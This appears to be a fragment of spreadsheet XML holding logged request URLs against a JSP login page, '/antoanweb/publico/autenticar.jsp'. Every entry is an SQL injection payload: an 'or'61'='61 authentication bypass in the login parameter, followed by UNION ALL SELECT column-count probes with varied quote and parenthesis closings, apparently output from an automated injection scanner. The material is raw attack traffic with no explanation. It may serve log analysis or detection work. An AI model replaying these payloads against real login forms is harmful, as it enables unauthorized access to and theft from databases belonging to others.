    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554,554--and('pnrf'like'pnrf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924,4924--and('rshr'like'rshr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611,2611--and(('aikk'like'aikk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559--and(('tnef'like'tnef</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549,2549--and(('pkdk'like'pkdk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028--and(('pfkm'like'pfkm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764,2764--and(('igkn'like'igkn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890--and(('tqcc'like'tqcc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724,4724--and(('hqnd'like'hqnd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360,3360--and(('sqen'like'sqen</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905--and(('trud'like'trud</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058,6058--and(('znxv'like'znxv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957--and((('olon'like'olon</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250,3250--and((('zxwn'like'zxwn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217--and((('zsig'like'zsig</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134,3134--and((('kbth'like'kbth</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376,9376--and((('mbyp'like'mbyp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156,6156--and((('bxnx'like'bxnx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485,7485--and((('hwot'like'hwot</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517,5517--and((('yxtx'like'yxtx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739,3739--and((('zizf'like'zizf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494,6494--and((('ptdn'like'ptdn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9780,9780,9780,9780,9780,9780,9780,9780,9780,9780,9780,9780,9780,9780,9780,9780,9780,9780,9780,9780,9780--and'jzwj'like'jzwj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987,2987--and'sqlo'like'sqlo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045,7045--and'ocnp'like'ocnp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179--and'zqvj'like'zqvj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581--and'crjt'like'crjt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910--and'druw'like'druw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440--and'fooa'like'fooa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635--and'vkrc'like'vkrc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096,1096--and'zvto'like'zvto</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101,6101--and'zduk'like'zduk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983--and("mibn"="mibn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865,7865--and("zhpt"="zhpt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333,4333--and("unav"="unav</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869,3869--and("orov"="orov</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773,1773--and("quvf"="quvf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045,4045--and("tctc"="tctc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635--and("yabi"="yabi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199,9199--and("nplt"="nplt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028--and("wmzx"="wmzx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905,905--and("eoks"="eoks</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5379,5379,5379,5379,5379,5379,5379,5379,5379,5379,5379,5379,5379,5379,5379,5379,5379,5379,5379,5379,5379--and(("fbnz"="fbnz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620,8620--and(("zpdi"="zpdi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602,602--and(("rags"="rags</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240--and(("bhki"="bhki</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245,3245--and(("vads"="vads</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400--and(("ycam"="ycam</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273,6273--and(("ehna"="ehna</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969,8969--and(("mpna"="mpna</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595,6595--and(("zzvv"="zzvv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433--and(("nezq"="nezq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8164,8164,8164,8164,8164,8164,8164,8164,8164,8164,8164,8164,8164,8164,8164,8164,8164,8164,8164,8164,8164--and((("klrg"="klrg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect374,374,374,374,374,374,374,374,374,374,374,374,374,374,374,374,374,374,374,374,374,374--and((("vlpq"="vlpq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085,6085--and((("uohx"="uohx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect903,903,903,903,903,903,903,903,903,903,903,903,903,903,903,903,903,903,903,903,903,903,903,903--and((("wrid"="wrid</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067,3067--and((("btym"="btym</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142,9142--and((("nbhj"="nbhj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996,996--and((("whrp"="whrp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312,7312--and((("eqzn"="eqzn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751,6751--and((("mvwa"="mvwa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467,7467--and((("npsd"="npsd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593--and"ndrl"="ndrl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703,5703--and"nyaj"="nyaj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880--and"qczr"="qczr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006--and"kqyp"="kqyp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963,7963--and"amuz"="amuz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776--and"snwr"="snwr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860--and"yjhm"="yjhm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239,4239--and"mght"="mght</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414,4414--and"crdz"="crdz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557,6557--and"qwqy"="qwqy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect401,401,401,401,401,401,401,401,401,401,401,401,401,401,401,401,401,401,401,401,401--and("vbwc"like"vbwc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287,4287--and("pmbi"like"pmbi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect653,653,653,653,653,653,653,653,653,653,653,653,653,653,653,653,653,653,653,653,653,653,653--and("wbli"like"wbli</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322,5322--and("dgtr"like"dgtr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083,8083--and("qrji"like"qrji</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370,7370--and("zdty"like"zdty</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778,4778--and("xkpk"like"xkpk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858,2858--and("hggg"like"hggg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983,7983--and("zdgj"like"zdgj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803,4803--and("chfh"like"chfh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9444,9444,9444,9444,9444,9444,9444,9444,9444,9444,9444,9444,9444,9444,9444,9444,9444,9444,9444,9444,9444--and(("yhtv"like"yhtv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121--and(("tvnm"like"tvnm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270,4270--and(("ydvl"like"ydvl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706,5706--and(("xpox"like"xpox</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878,3878--and(("gexx"like"gexx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503,2503--and(("cekz"like"cekz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860,3860--and(("rinr"like"rinr</t>
  </si>
  <si>
